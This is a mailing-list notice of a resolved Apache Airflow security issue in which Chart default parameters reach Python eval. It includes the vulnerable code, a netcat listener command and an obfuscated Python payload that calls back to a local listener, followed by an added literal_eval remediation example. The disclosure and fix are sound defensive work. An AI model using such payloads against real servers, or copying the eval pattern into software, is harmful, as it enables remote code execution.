Posted to commits@airflow.apache.org by "Bolke de Bruin (JIRA)" <ji...@apache.org> on 2017/03/14 19:28:41 UTC

[jira] [Resolved] (AIRFLOW-933) Security - Airflow Use of Eval Allows for Remote Code Execution

     [ https://issues.apache.org/jira/browse/AIRFLOW-933?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Bolke de Bruin resolved AIRFLOW-933.
------------------------------------
       Resolution: Fixed
    Fix Version/s: 1.8.0

> Security - Airflow Use of Eval Allows for Remote Code Execution
> ---------------------------------------------------------------
>
>                 Key: AIRFLOW-933
>                 URL: https://issues.apache.org/jira/browse/AIRFLOW-933
>             Project: Apache Airflow
>          Issue Type: Bug
>            Reporter: Rui Wang
>            Assignee: Rui Wang
>             Fix For: 1.8.0
>
>
> Impact: Any user with the ability to create or edit Charts may execute arbitrary code on the Airflow server.
> Location: The Default Parameters form field sent when saving a Chart located at /admin/chart/new/
> Description: The Chart functionality allows for the definition of Default Parameters, which are baseline constraints for the values within a chart.
> This data is user-controllable and passed directly to a Python eval, which will execute code:
> {code}
> from flask import Markup, url_for
>
> def label_link(v, c, m, p):
>     # m.default_params is user-controlled text from the Chart form; eval()
>     # executes it as Python, which is the vulnerability described above.
>     try:
>         default_params = eval(m.default_params)
>     except:
>         default_params = {}
>     url = url_for(
>         'airflow.chart', chart_id=m.id, iteration_no=m.iteration_no,
>         **default_params)
>     return Markup("<a href='{url}'>{m.label}</a>".format(**locals()))
> {code}
> Reproduction Steps:
> 1. Configure a local instance of Airflow, and start a local netcat listener with the following shell command: nc -l 1337.
> 2. Access Airflow as a user able to create or edit Charts.
> 3. Browse to /admin/chart/new to bring up the UI for creating a Chart.
> 4. In its Default Parameters field, enter the following example payload:
>   (lambda __g: [(urllib.request.urlopen('http://127.0.0.1:1337/').read (), None)[1] for __g['urllib'] in [(__import__('urllib.request', __g, __g))]][0])(globals())
> 5. Save the Chart, and observe that the application has made a network request to your listener, indicating that your code has executed.
> Remediation: Use the Python method ast.literal_eval (https://docs.python.org/3/library/ast.html#ast.literal_eval) which safely parses its input, rather than executing it as code.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)
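The remediation in the issue is to replace eval with ast.literal_eval. The following is an added example, not Airflow's own code or the fix that shipped in 1.8.0: it parses the Default Parameters string as a Python literal, and additionally checks that the result is a dict with string keys, since the parsed value is splatted into url_for(**default_params) and only string keys are valid keyword names. The label_link_url helper is a hypothetical stand-in for Flask's url_for, and the sample inputs are constructed for this example.

```python
import ast
from typing import Any, Dict
from urllib.parse import urlencode


def parse_default_params(raw: str) -> Dict[str, Any]:
    """Parse a user-supplied 'Default Parameters' string without executing it.

    ast.literal_eval accepts only Python literals (dicts, lists, tuples, sets,
    strings, numbers, booleans, None). Any expression that would call a
    function, import a module or look up a name raises ValueError or
    SyntaxError instead of running, so such input is rejected here.
    """
    if not raw or not raw.strip():
        return {}
    try:
        value = ast.literal_eval(raw)
    except (ValueError, SyntaxError, TypeError, MemoryError, RecursionError):
        # Not a literal (or not well-formed): fall back to no parameters,
        # matching the empty-dict fallback of the original code.
        return {}
    # Only a dict can be safely splatted into url_for(**default_params), and
    # its keys become keyword argument names, so they must be strings.
    if not isinstance(value, dict) or not all(isinstance(k, str) for k in value):
        return {}
    return value


def label_link_url(chart_id: int, iteration_no: int, raw_default_params: str) -> str:
    """Hypothetical stand-in for url_for('airflow.chart', ...) used by label_link.

    It builds the chart link from the fixed chart identifiers plus the safely
    parsed default parameters (constructed for this example, not Flask's API).
    """
    params: Dict[str, Any] = {"chart_id": chart_id, "iteration_no": iteration_no}
    params.update(parse_default_params(raw_default_params))
    return "/admin/airflow/chart?" + urlencode(params)


if __name__ == "__main__":
    # Constructed inputs: a benign literal dict, and a call expression that
    # eval() would execute but literal_eval refuses.
    print(parse_default_params("{'ds': '2017-03-14', 'limit': 10}"))
    print(parse_default_params("len('abc')"))
    print(label_link_url(7, 3, "{'ds': '2017-03-14'}"))
```

The type and key checks matter as much as the swap to literal_eval: a literal such as `[1, 2]` or `{1: 'x'}` is harmless to parse but would still raise a TypeError inside url_for, so the parser normalises anything that is not a string-keyed dict to the same empty-dict fallback the original code used.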